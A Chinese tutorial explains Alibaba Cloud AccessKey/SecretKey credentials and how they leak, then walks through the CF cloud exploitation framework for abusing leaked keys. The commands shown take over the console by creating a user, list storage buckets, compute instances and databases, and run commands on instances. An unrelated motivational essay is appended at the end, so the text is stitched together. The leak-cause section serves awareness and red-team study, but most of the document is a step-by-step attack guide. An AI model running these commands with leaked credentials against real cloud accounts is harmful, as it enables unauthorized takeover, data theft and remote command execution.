首先认识下阿里云官方解释的什么是AccessKey:
在调用阿里云API时您需要使用AccessKey完成身份验证。
AccessKey包括AccessKey ID和AccessKey Secret,需要一起使用。具体如下:
AccessKey ID:用于标识用户。
AccessKey Secret:用于验证用户的密钥。AccessKey Secret必须保密。
Access Key Id / Secret Access Key
加密的方法来验证某个请求的发送者身份。Access Key Id(AK)
用于标示用户,Secret Access Key(SK)
是用户用于加密认证字符串和云厂商用来验证认证字符串的密钥,其中SK必须保密
。AK/SK
原理使用对称加解密。Access Key
和Secret Key
的组合是敏感信息
,类似于用户名和密码的组合,需要妥善保管和保密。
如果 AK 或 SK 泄露,未经授权的人可能会使用它们来访问和操作用户的云资源,导致数据泄露
、资源滥用
或其他安全风险
。
硬编码产生泄露
例如将AK/SK硬编码到程序代码/配置文件
中,攻击者只需要对小程序包进行反编译
即可获取AK/SK。安全意识单薄&存储手段缺失
最直白的如硬编码到业务代码中并上传github
,其次也有明文配置
到配置文件并在日志中任意打印
,或者明文保存
在代码库
、配置文件
、公开可访问的存储桶
、版本控制系统中
,这些都可能被攻击者获取。AK/SK业务隔离手段缺失
,比如多个业务共有一对AKSK,这样任何一个业务造成的AKSK泄露都会导致其他业务受影响。比如Bucket
允许任意文件上传和读取、bucket允许匿名访问、bucket允许列出文件、bucket允许盲上传AK/SK安全分发手段缺失
,比如直接通过微信、企业微信
等即时通讯工具对AK/SK口口相传
等等CF 是一个云环境利用框架
,适用于在红队场景中对云上
内网进行横向、SRC 场景中对 Access Key
即访问凭证的影响程度进行判定、企业场景中对自己的云上资产进行自检
等等。
当前已支持阿里云
、腾讯云
、AWS
和华为云
。
大部分的云主机都支持AK/SK都认证方式,用于API调用等功能,由于开发的不规范,以及一些其它漏洞,可能会导致AK/SK泄露。在渗透中,如果发现目标泄露了AK/SK,可以通过AK/SK直接攻击其对应的云服务器。
1、访问配置,输入AccessKey
键盘上下键选择云服务商后回车,然后程序会提示输入访问密钥别名,以及输入访问密钥 ID (Input Access Key Id)
、输入同样的Access Key Id值
即可;回车后输入Access Key Secret
;再次回车,直接输入optiona即可配置完成。
2、输入以下命令可查看当前获取的腾讯云服务器的权限
cf tencent perm
3、接管控制台
接管控制台的时候默认会创建一个名称为 crossfire 的用户,如果想改成其他用户名可以使用 -u
参数
接管控制台需要当前访问凭证至少拥有 AliyunRAMFullAccess
权限。
cf tencent console
1、访问配置,输入AccessKey
在配置凭证的时候 Access Key ID
和 Access Key Secret
参数是必填的,
注意:只有当配置临时访问凭证时,才需要填 STS Token
参数,这个不是临时的,所以直接回车就可以。
2、查看凭证
cf config ls
cf config ls -a
使用 ls 命令列出配置的时候,如果配置内容过长,这时输出内容会进行部分省略展示,如果想列出凭证的全部内容,可以使用 -a 或者--all命令。
cf alibaba console 接管控制台的时候默认会创建一个名称为 crossfire 的用户,如果想改成其他用户名可以使用 -u 参数
cf alibaba console -u testqwe 接管控制台需要当前访问凭证至少拥有 AliyunRAMFullAccess 权限。
1、登陆控制台
https://signin.aliyun.com
testqwe@xxxxxxx8
axxxxxxxxx
可以看到是 AdministratorAccess
即管理所有阿里云资源的权限(RAM用户)
cf alibaba perm
cf alibaba ls
终通过 CF 列出这个 AK 里有 0 个存储桶以及100+多台云服务主机。
1、列出阿里云 OSS 对象存储服务
cf alibaba oss ls
cf alibaba oss ls -n 100 指定获取对象的数量,可以使用 -n 或者 --number 参数
2、 列出存储桶里的对象
cf alibaba oss obj ls
cf alibaba oss obj ls -n 100
1、使用以下命令列出 ECS 弹性计算服务
cf alibaba ecs ls
2、指定实例,可以使用 -i
或者 --instanceID
参数
cf alibaba ecs ls -i i-xxxxxxxx
3、执行单行命令
cf alibaba ecs exec -c whoami -i i-2ze8mflaq9vt9m4hz7rw
1、列出阿里云 RDS 云数据库服务
cf alibaba rds ls
cf alibaba rds ls -a 使用-a 命令,会列出数据库实例的详细信息
cf alibaba console cancel 取消控制台接管
cf config del 删除配置密钥
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!
很认可这样一句话:“人生最好的状态,莫过于有事做、有人爱、有所期待。
”
很多人之所以能越活越优秀,都因心中葆有热爱
,让他们可以全身心地投入工作和生活,并从中找到属于自我的意义和价值。
对于生活而言,热爱
无疑是治愈迷茫最好的解药。
它会赋予你能量,赐予你热情,吸引你不断去探寻生命的更多可能性。
心有热爱,眼中自有光芒。
愿接下来的日子,你能找到所热爱
的事,并为之全力以赴
,活成自己喜欢的样子。
----《告别迷茫,找到热爱
》